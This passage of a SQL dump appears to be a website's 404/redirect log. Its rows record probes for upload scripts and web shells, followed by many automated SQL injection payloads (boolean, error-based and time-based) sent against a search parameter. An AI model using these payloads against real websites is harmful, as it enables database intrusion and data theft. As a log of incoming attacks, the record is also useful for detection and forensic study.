00:00:00',301),(34915,'http://www.3s-technologies.com.tr/tr/public/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/Public/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:41','0000-00-00 00:00:00',301),(34916,'http://www.3s-technologies.com.tr/tr/static/admin/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/static/admin/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:42','0000-00-00 00:00:00',301),(34917,'http://www.3s-technologies.com.tr/tr/public/admin/webuploader/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/Public/admin/webuploader/server/fileupload.php','',2,0,'2024-06-14 08:10:43','0000-00-00 00:00:00',301),(34918,'http://www.3s-technologies.com.tr/tr/fix/public/webuploader/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/fix/Public/Webuploader/server/fileupload.php','',2,0,'2024-06-14 08:10:44','0000-00-00 00:00:00',301),(34919,'https://3s-technologies.com.tr/en/wp-content/plugins/include.php',NULL,'www.google.com','',15,0,'2024-06-15 00:42:20','0000-00-00 00:00:00',301),(34920,'https://3s-technologies.com.tr/en/wp-content/themes/include.php',NULL,'www.google.com','',16,0,'2024-06-15 00:42:47','0000-00-00 00:00:00',301),(34921,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=4152',NULL,'','',1,0,'2024-06-15 06:02:41','0000-00-00 00:00:00',301),(34922,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'gcbxpo<\'\">cfrbkr',NULL,'','',1,0,'2024-06-15 06:02:44','0000-00-00 00:00:00',301),(34923,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	3661/**/like	1172/**/and	(\'ypsl\'/**/like	\'ypsl',NULL,'','',1,0,'2024-06-15 06:02:48','0000-00-00 00:00:00',301),(34924,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	7617/**/like	7617/**/and	(\'mxhc\'/**/like	\'mxhc',NULL,'','',1,0,'2024-06-15 06:02:49','0000-00-00 00:00:00',301),(34925,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	2479/**/like	5647/**/and	\'bjnf\'/**/like	\'bjnf',NULL,'','',1,0,'2024-06-15 06:02:51','0000-00-00 00:00:00',301),(34926,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	7617/**/like	7617/**/and	\'hhmw\'/**/like	\'hhmw',NULL,'','',1,0,'2024-06-15 06:02:52','0000-00-00 00:00:00',301),(34927,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	9115/**/like	6881/**/and	(9483/**/between	9483/**/and	9483',NULL,'','',1,0,'2024-06-15 06:02:53','0000-00-00 00:00:00',301),(34928,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	7617/**/like	7617/**/and	(6603/**/between	6603/**/and	6603',NULL,'','',1,0,'2024-06-15 06:02:55','0000-00-00 00:00:00',301),(34929,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	7385/**/between	2997/**/and	2997',NULL,'','',1,0,'2024-06-15 06:02:56','0000-00-00 00:00:00',301),(34930,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	7617/**/between	7617/**/and	7617',NULL,'','',1,0,'2024-06-15 06:02:57','0000-00-00 00:00:00',301),(34931,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	9838/**/between	6426/**/and	6426--/**/gyyy',NULL,'','',1,0,'2024-06-15 06:02:59','0000-00-00 00:00:00',301),(34932,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	7617/**/between	7617/**/and	7617--/**/frpt',NULL,'','',1,0,'2024-06-15 06:03:00','0000-00-00 00:00:00',301),(34933,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=(select	(case	when	(5645/**/like	7082)/**/then	\'opensearch\'/**/else	(select	7082/**/union	select	7996)/**/end	))',NULL,'','',1,0,'2024-06-15 06:03:01','0000-00-00 00:00:00',301),(34934,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=(select	(case	when	(5750/**/like	5750)/**/then	\'opensearch\'/**/else	(select	4861/**/union	select	4420)/**/end	))',NULL,'','',1,0,'2024-06-15 06:03:03','0000-00-00 00:00:00',301),(34935,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	extractvalue(7607,concat(0x5c,0x71716b7171,(select	(elt(7607/**/like	7607,1))),0x716a767071))/**/and	(\'uwdr\'/**/like	\'uwdr',NULL,'','',1,0,'2024-06-15 06:03:04','0000-00-00 00:00:00',301),(34936,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	extractvalue(7607,concat(0x5c,0x71716b7171,(select	(elt(7607/**/like	7607,1))),0x716a767071))/**/and	\'qqvc\'/**/like	\'qqvc',NULL,'','',1,0,'2024-06-15 06:03:06','0000-00-00 00:00:00',301),(34937,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	extractvalue(7607,concat(0x5c,0x71716b7171,(select	(elt(7607/**/like	7607,1))),0x716a767071))/**/and	(6528/**/between	6528/**/and	6528',NULL,'','',1,0,'2024-06-15 06:03:08','0000-00-00 00:00:00',301),(34938,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	extractvalue(7607,concat(0x5c,0x71716b7171,(select	(elt(7607/**/between	7607/**/and	7607,1))),0x716a767071))',NULL,'','',1,0,'2024-06-15 06:03:09','0000-00-00 00:00:00',301),(34939,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	extractvalue(7607,concat(0x5c,0x71716b7171,(select	(elt(7607/**/between	7607/**/and	7607,1))),0x716a767071))--/**/xijp',NULL,'','',1,0,'2024-06-15 06:03:10','0000-00-00 00:00:00',301),(34940,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	6897/**/like	cast((chr(113)||chr(113)||chr(107)||chr(113)||chr(113))||(select	(case	when	(6897/**/like	6897)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(106)||chr(118)||chr(112)||chr(113))/**/as	numeric	)/**/and	(\'hoci\'/**/like	\'hoci',NULL,'','',1,0,'2024-06-15 06:03:12','0000-00-00 00:00:00',301),(34941,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	6897/**/like	cast((chr(113)||chr(113)||chr(107)||chr(113)||chr(113))||(select	(case	when	(6897/**/like	6897)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(106)||chr(118)||chr(112)||chr(113))/**/as	numeric	)/**/and	\'slhm\'/**/like	\'slhm',NULL,'','',1,0,'2024-06-15 06:03:13','0000-00-00 00:00:00',301),(34942,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	6897/**/like	cast((chr(113)||chr(113)||chr(107)||chr(113)||chr(113))||(select	(case	when	(6897/**/like	6897)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(106)||chr(118)||chr(112)||chr(113))/**/as	numeric	)/**/and	(8218/**/between	8218/**/and	8218',NULL,'','',1,0,'2024-06-15 06:03:15','0000-00-00 00:00:00',301),(34943,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	6897/**/between	cast((chr(113)/**/and	cast((chr(113)||chr(113)||chr(107)||chr(113)||chr(113))||(select	(case	when	(6897/**/like	6897)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(106)||chr(118)||chr(112)||chr(113))/**/as	numeric	)',NULL,'','',1,0,'2024-06-15 06:03:16','0000-00-00 00:00:00',301),(34944,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	6897/**/between	cast((chr(113)/**/and	cast((chr(113)||chr(113)||chr(107)||chr(113)||chr(113))||(select	(case	when	(6897/**/like	6897)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(106)||chr(118)||chr(112)||chr(113))/**/as	numeric	)--/**/dmef',NULL,'','',1,0,'2024-06-15 06:03:17','0000-00-00 00:00:00',301),(34945,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	2095/**/in	(select	(char(113)+char(113)+char(107)+char(113)+char(113)+(select	(case	when	(2095/**/like	2095)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(106)+char(118)+char(112)+char(113)))/**/and	(\'ykcv\'/**/like	\'ykcv',NULL,'','',1,0,'2024-06-15 06:03:19','0000-00-00 00:00:00',301),(34946,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	2095/**/in	(select	(char(113)+char(113)+char(107)+char(113)+char(113)+(select	(case	when	(2095/**/like	2095)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(106)+char(118)+char(112)+char(113)))/**/and	\'evpf\'/**/like	\'evpf',NULL,'','',1,0,'2024-06-15 06:03:20','0000-00-00 00:00:00',301),(34947,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	2095/**/in	(select	(char(113)+char(113)+char(107)+char(113)+char(113)+(select	(case	when	(2095/**/like	2095)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(106)+char(118)+char(112)+char(113)))/**/and	(6013/**/between	6013/**/and	6013',NULL,'','',1,0,'2024-06-15 06:03:21','0000-00-00 00:00:00',301),(34948,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	2095/**/in	(select	(char(113)+char(113)+char(107)+char(113)+char(113)+(select	(case	when	(2095/**/between	2095)/**/and	2095)then	char(49)/**/else	char(48)/**/end	))+char(113)+char(106)+char(118)+char(112)+char(113)))',NULL,'','',1,0,'2024-06-15 06:03:23','0000-00-00 00:00:00',301),(34949,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	2095/**/in	(select	(char(113)+char(113)+char(107)+char(113)+char(113)+(select	(case	when	(2095/**/between	2095)/**/and	2095)then	char(49)/**/else	char(48)/**/end	))+char(113)+char(106)+char(118)+char(112)+char(113)))--/**/fgul',NULL,'','',1,0,'2024-06-15 06:03:24','0000-00-00 00:00:00',301),(34950,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	1752/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(113)||chr(107)||chr(113)||chr(113)||(select	(case	when	(1752/**/like	1752)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(106)||chr(118)||chr(112)||chr(113)||chr(62)))/**/from	dual	)/**/and	(\'inkm\'/**/like	\'inkm',NULL,'','',1,0,'2024-06-15 06:03:26','0000-00-00 00:00:00',301),(34951,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	1752/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(113)||chr(107)||chr(113)||chr(113)||(select	(case	when	(1752/**/like	1752)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(106)||chr(118)||chr(112)||chr(113)||chr(62)))/**/from	dual	)/**/and	\'mubr\'/**/like	\'mubr',NULL,'','',1,0,'2024-06-15 06:03:28','0000-00-00 00:00:00',301),(34952,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	1752/**/like	(select	upper(xmltype(chr(60)||chr(58)||chr(113)||chr(113)||chr(107)||chr(113)||chr(113)||(select	(case	when	(1752/**/like	1752)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(106)||chr(118)||chr(112)||chr(113)||chr(62)))/**/from	dual	)/**/and	(3174/**/between	3174/**/and	3174',NULL,'','',1,0,'2024-06-15 06:03:29','0000-00-00 00:00:00',301),(34953,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	1752/**/between	(select	and	(selectupper(xmltype(chr(60)||chr(58)||chr(113)||chr(113)||chr(107)||chr(113)||chr(113)||(select	(case	when	(1752/**/like	1752)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(106)||chr(118)||chr(112)||chr(113)||chr(62)))/**/from	dual	)',NULL,'','',1,0,'2024-06-15 06:03:31','0000-00-00 00:00:00',301),(34954,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	1752/**/between	(select	and	(selectupper(xmltype(chr(60)||chr(58)||chr(113)||chr(113)||chr(107)||chr(113)||chr(113)||(select	(case	when	(1752/**/like	1752)/**/then	1/**/else	0/**/end	)/**/from	dual	)||chr(113)||chr(106)||chr(118)||chr(112)||chr(113)||chr(62)))/**/from	dual	)--/**/cfxr',NULL,'','',1,0,'2024-06-15 06:03:32','0000-00-00 00:00:00',301),(34955,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=(select	concat(concat(\'qqkqq\',(case	when	(4301/**/like	4301)/**/then	\'1\'/**/else	\'0\'/**/end	)),\'qjvpq\'))',NULL,'','',1,0,'2024-06-15 06:03:33','0000-00-00 00:00:00',301),(34956,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\');select	pg_sleep(5)--',NULL,'','',2,0,'2024-06-15 06:03:35','0000-00-00 00:00:00',301),(34957,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\';select	pg_sleep(5)--',NULL,'','',2,0,'2024-06-15 06:03:36','0000-00-00 00:00:00',301),(34958,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch);select	pg_sleep(5)--',NULL,'','',2,0,'2024-06-15 06:03:37','0000-00-00 00:00:00',301),(34959,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch;select	pg_sleep(5)--',NULL,'','',2,0,'2024-06-15 06:03:39','0000-00-00 00:00:00',301),(34960,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\');waitfor/**/delay/**/\'0:0:5\'--',NULL,'','',2,0,'2024-06-15 06:03:40','0000-00-00 00:00:00',301),(34961,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\';waitfor/**/delay/**/\'0:0:5\'--',NULL,'','',2,0,'2024-06-15 06:03:41','0000-00-00 00:00:00',301),(34962,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch);waitfor/**/delay/**/\'0:0:5\'--',NULL,'','',2,0,'2024-06-15 06:03:43','0000-00-00 00:00:00',301),(34963,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch;waitfor/**/delay/**/\'0:0:5\'--',NULL,'','',2,0,'2024-06-15 06:03:44','0000-00-00 00:00:00',301),(34964,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\');select	dbms_pipe.receive_message(chr(77)||chr(102)||chr(90)||chr(65),5)/**/from	dual	--',NULL,'','',1,0,'2024-06-15 06:03:45','0000-00-00 00:00:00',301),(34965,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\';select	dbms_pipe.receive_message(chr(77)||chr(102)||chr(90)||chr(65),5)/**/from	dual	--',NULL,'','',1,0,'2024-06-15 06:03:47','0000-00-00 00:00:00',301),(34966,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch);select	dbms_pipe.receive_message(chr(77)||chr(102)||chr(90)||chr(65),5)/**/from	dual	--',NULL,'','',1,0,'2024-06-15 06:03:48','0000-00-00 00:00:00',301),(34967,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch;select	dbms_pipe.receive_message(chr(77)||chr(102)||chr(90)||chr(65),5)/**/from	dual	--',NULL,'','',1,0,'2024-06-15 06:03:49','0000-00-00 00:00:00',301),(34968,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	(select	2905/**/from	(select(sleep(5)))sjfa)/**/and	(\'rfqg\'/**/like	\'rfqg',NULL,'','',1,0,'2024-06-15 06:03:51','0000-00-00 00:00:00',301),(34969,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	(select	2905/**/from	(select(sleep(5)))sjfa)/**/and	\'aeos\'/**/like	\'aeos',NULL,'','',1,0,'2024-06-15 06:03:52','0000-00-00 00:00:00',301),(34970,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	(select	2905/**/from	(select(sleep(5)))sjfa)/**/and	(1264/**/between	1264/**/and	1264',NULL,'','',1,0,'2024-06-15 06:03:53','0000-00-00 00:00:00',301),(34971,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	(select	2905/**/from	(select(sleep(5)))sjfa)',NULL,'','',1,0,'2024-06-15 06:03:55','0000-00-00 00:00:00',301),(34972,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	(select	2905/**/from	(select(sleep(5)))sjfa)--/**/swba',NULL,'','',1,0,'2024-06-15 06:03:56','0000-00-00 00:00:00',301),(34973,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	3871/**/like	(select	3871/**/from	pg_sleep(5))/**/and	(\'awcm\'/**/like	\'awcm',NULL,'','',1,0,'2024-06-15 06:03:57','0000-00-00 00:00:00',301),(34974,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	3871/**/like	(select	3871/**/from	pg_sleep(5))/**/and	\'bmks\'/**/like	\'bmks',NULL,'','',1,0,'2024-06-15 06:03:59','0000-00-00 00:00:00',301),(34975,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	3871/**/like	(select	3871/**/from	pg_sleep(5))/**/and	(7811/**/between	7811/**/and	7811',NULL,'','',1,0,'2024-06-15 06:04:00','0000-00-00 00:00:00',301),(34976,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	3871/**/between	(select	and	(select3871/**/from	pg_sleep(5))',NULL,'','',1,0,'2024-06-15 06:04:01','0000-00-00 00:00:00',301),(34977,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	3871/**/between	(select	and	(select3871/**/from	pg_sleep(5))--/**/ikvp',NULL,'','',1,0,'2024-06-15 06:04:03','0000-00-00 00:00:00',301),(34978,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/waitfor/**/delay/**/\'0:0:5\'/**/and	(\'vkhn\'/**/like	\'vkhn',NULL,'','',1,0,'2024-06-15 06:04:04','0000-00-00 00:00:00',301),(34979,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/waitfor/**/delay/**/\'0:0:5\'/**/and	\'lbab\'/**/like	\'lbab',NULL,'','',1,0,'2024-06-15 06:04:05','0000-00-00 00:00:00',301),(34980,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/waitfor/**/delay/**/\'0:0:5\'/**/and	(6068/**/between	6068/**/and	6068',NULL,'','',1,0,'2024-06-15 06:04:07','0000-00-00 00:00:00',301),(34981,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/waitfor/**/delay/**/\'0:0:5\'',NULL,'','',2,0,'2024-06-15 06:04:08','0000-00-00 00:00:00',301),(34982,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/waitfor/**/delay/**/\'0:0:5\'--/**/eguq',NULL,'','',1,0,'2024-06-15 06:04:09','0000-00-00 00:00:00',301),(34983,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/and	2229/**/like	dbms_pipe.receive_message(chr(69)||chr(75)||chr(106)||chr(114),5)/**/and	(\'ueup\'/**/like	\'ueup',NULL,'','',1,0,'2024-06-15 06:04:11','0000-00-00 00:00:00',301),(34984,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/and	2229/**/like	dbms_pipe.receive_message(chr(69)||chr(75)||chr(106)||chr(114),5)/**/and	\'ixaa\'/**/like	\'ixaa',NULL,'','',1,0,'2024-06-15 06:04:12','0000-00-00 00:00:00',301),(34985,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/and	2229/**/like	dbms_pipe.receive_message(chr(69)||chr(75)||chr(106)||chr(114),5)/**/and	(4274/**/between	4274/**/and	4274',NULL,'','',1,0,'2024-06-15 06:04:13','0000-00-00 00:00:00',301),(34986,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	2229/**/between	dbms_pipe/**/and	dbms_pipe.receive_message(chr(69)||chr(75)||chr(106)||chr(114),5)',NULL,'','',1,0,'2024-06-15 06:04:15','0000-00-00 00:00:00',301),(34987,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/and	2229/**/between	dbms_pipe/**/and	dbms_pipe.receive_message(chr(69)||chr(75)||chr(106)||chr(114),5)--/**/dkzl',NULL,'','',1,0,'2024-06-15 06:04:16','0000-00-00 00:00:00',301),(34988,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\')/**/order	by	1--/**/xeyz',NULL,'','',1,0,'2024-06-15 06:04:17','0000-00-00 00:00:00',301),(34989,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch\'/**/order	by	1--/**/wdhm',NULL,'','',1,0,'2024-06-15 06:04:19','0000-00-00 00:00:00',301),(34990,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch)/**/order	by	1--/**/wyxx',NULL,'','',1,0,'2024-06-15 06:04:20','0000-00-00 00:00:00',301),(34991,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/order	by	1--/**/enkl',NULL,'','',1,0,'2024-06-15 06:04:21','0000-00-00 00:00:00',301),(34992,'https://www.3s-technologies.com.tr/tr/component/search/?itemid=594&format=opensearch/**/order	by	1--/**/qehx',NULL,'','',1,0,'2024-06-15 06:04:23','0000-00-00 00:00:00',301),(34993,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=3678',NULL,'','',1,0,'2024-06-15 08:03:57','0000-00-00 00:00:00',301),(34994,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\'zcsjwz<\'\">izkstv',NULL,'','',1,0,'2024-06-15 08:04:00','0000-00-00 00:00:00',301),(34995,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\')/**/and	5601/**/like	2118/**/and	(\'iiwp\'/**/like	\'iiwp',NULL,'','',1,0,'2024-06-15 08:04:02','0000-00-00 00:00:00',301),(34996,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\')/**/and	9982/**/like	9982/**/and	(\'fdze\'/**/like	\'fdze',NULL,'','',1,0,'2024-06-15 08:04:04','0000-00-00 00:00:00',301),(34997,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\'/**/and	5834/**/like	1981/**/and	\'vhdm\'/**/like	\'vhdm',NULL,'','',1,0,'2024-06-15 08:04:05','0000-00-00 00:00:00',301),(34998,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\'/**/and	9982/**/like	9982/**/and	\'sawd\'/**/like	\'sawd',NULL,'','',1,0,'2024-06-15 08:04:06','0000-00-00 00:00:00',301),(34999,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch)/**/and	3612/**/like	2684/**/and	(8121/**/between	8121/**/and	8121',NULL,'','',1,0,'2024-06-15 08:04:08','0000-00-00 00:00:00',301),(35000,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch)/**/and	9982/**/like	9982/**/and	(8057/**/between	8057/**/and	8057',NULL,'','',1,0,'2024-06-15 08:04:09','0000-00-00 00:00:00',301),(35001,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	1946/**/between	8580/**/and	8580',NULL,'','',1,0,'2024-06-15 08:04:10','0000-00-00 00:00:00',301),(35002,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	9982/**/between	9982/**/and	9982',NULL,'','',1,0,'2024-06-15 08:04:12','0000-00-00 00:00:00',301),(35003,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	2405/**/between	8206/**/and	8206--/**/dmse',NULL,'','',1,0,'2024-06-15 08:04:13','0000-00-00 00:00:00',301),(35004,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	9982/**/between	9982/**/and	9982--/**/oqul',NULL,'','',1,0,'2024-06-15 08:04:14','0000-00-00 00:00:00',301),(35005,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=(select	(case	when	(2340/**/like	1178)/**/then	\'opensearch\'/**/else	(select	1178/**/union	select	2521)/**/end	))',NULL,'','',1,0,'2024-06-15 08:04:16','0000-00-00 00:00:00',301),(35006,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=(select	(case	when	(6083/**/like	6083)/**/then	\'opensearch\'/**/else	(select	4715/**/union	select	7654)/**/end	))',NULL,'','',1,0,'2024-06-15 08:04:17','0000-00-00 00:00:00',301),(35007,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\')/**/and	extractvalue(9061,concat(0x5c,0x7171626271,(select	(elt(9061/**/like	9061,1))),0x716a717071))/**/and	(\'okit\'/**/like	\'okit',NULL,'','',1,0,'2024-06-15 08:04:19','0000-00-00 00:00:00',301),(35008,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\'/**/and	extractvalue(9061,concat(0x5c,0x7171626271,(select	(elt(9061/**/like	9061,1))),0x716a717071))/**/and	\'mwvk\'/**/like	\'mwvk',NULL,'','',1,0,'2024-06-15 08:04:21','0000-00-00 00:00:00',301),(35009,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch)/**/and	extractvalue(9061,concat(0x5c,0x7171626271,(select	(elt(9061/**/like	9061,1))),0x716a717071))/**/and	(6475/**/between	6475/**/and	6475',NULL,'','',1,0,'2024-06-15 08:04:23','0000-00-00 00:00:00',301),(35010,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	extractvalue(9061,concat(0x5c,0x7171626271,(select	(elt(9061/**/between	9061/**/and	9061,1))),0x716a717071))',NULL,'','',1,0,'2024-06-15 08:04:24','0000-00-00 00:00:00',301),(35011,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	extractvalue(9061,concat(0x5c,0x7171626271,(select	(elt(9061/**/between	9061/**/and	9061,1))),0x716a717071))--/**/rzon',NULL,'','',1,0,'2024-06-15 08:04:26','0000-00-00 00:00:00',301),(35012,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\')/**/and	9002/**/like	cast((chr(113)||chr(113)||chr(98)||chr(98)||chr(113))||(select	(case	when	(9002/**/like	9002)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(106)||chr(113)||chr(112)||chr(113))/**/as	numeric	)/**/and	(\'bxna\'/**/like	\'bxna',NULL,'','',1,0,'2024-06-15 08:04:27','0000-00-00 00:00:00',301),(35013,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\'/**/and	9002/**/like	cast((chr(113)||chr(113)||chr(98)||chr(98)||chr(113))||(select	(case	when	(9002/**/like	9002)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(106)||chr(113)||chr(112)||chr(113))/**/as	numeric	)/**/and	\'iwod\'/**/like	\'iwod',NULL,'','',1,0,'2024-06-15 08:04:28','0000-00-00 00:00:00',301),(35014,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch)/**/and	9002/**/like	cast((chr(113)||chr(113)||chr(98)||chr(98)||chr(113))||(select	(case	when	(9002/**/like	9002)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(106)||chr(113)||chr(112)||chr(113))/**/as	numeric	)/**/and	(8844/**/between	8844/**/and	8844',NULL,'','',1,0,'2024-06-15 08:04:30','0000-00-00 00:00:00',301),(35015,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	9002/**/between	cast((chr(113)/**/and	cast((chr(113)||chr(113)||chr(98)||chr(98)||chr(113))||(select	(case	when	(9002/**/like	9002)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(106)||chr(113)||chr(112)||chr(113))/**/as	numeric	)',NULL,'','',1,0,'2024-06-15 08:04:31','0000-00-00 00:00:00',301),(35016,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch/**/and	9002/**/between	cast((chr(113)/**/and	cast((chr(113)||chr(113)||chr(98)||chr(98)||chr(113))||(select	(case	when	(9002/**/like	9002)/**/then	1/**/else	0/**/end	))::text||(chr(113)||chr(106)||chr(113)||chr(112)||chr(113))/**/as	numeric	)--/**/qrau',NULL,'','',1,0,'2024-06-15 08:04:33','0000-00-00 00:00:00',301),(35017,'https://www.3s-technologies.com.tr/en/component/search/?itemid=593&format=opensearch\')/**/and	1972/**/in	(select	(char(113)+char(113)+char(98)+char(98)+char(113)+(select	(case	when	(1972/**/like	1972)/**/then	char(49)/**/else	char(48)/**/end	))+char(113)+char(106)+char(113)+char(112)+char(113)))/**/and	(\'cghr\'/**/like	\'cghr',NULL,'','',1,0,'2024-06-15 08:04:34','0000-00-00 00:00:00',301);
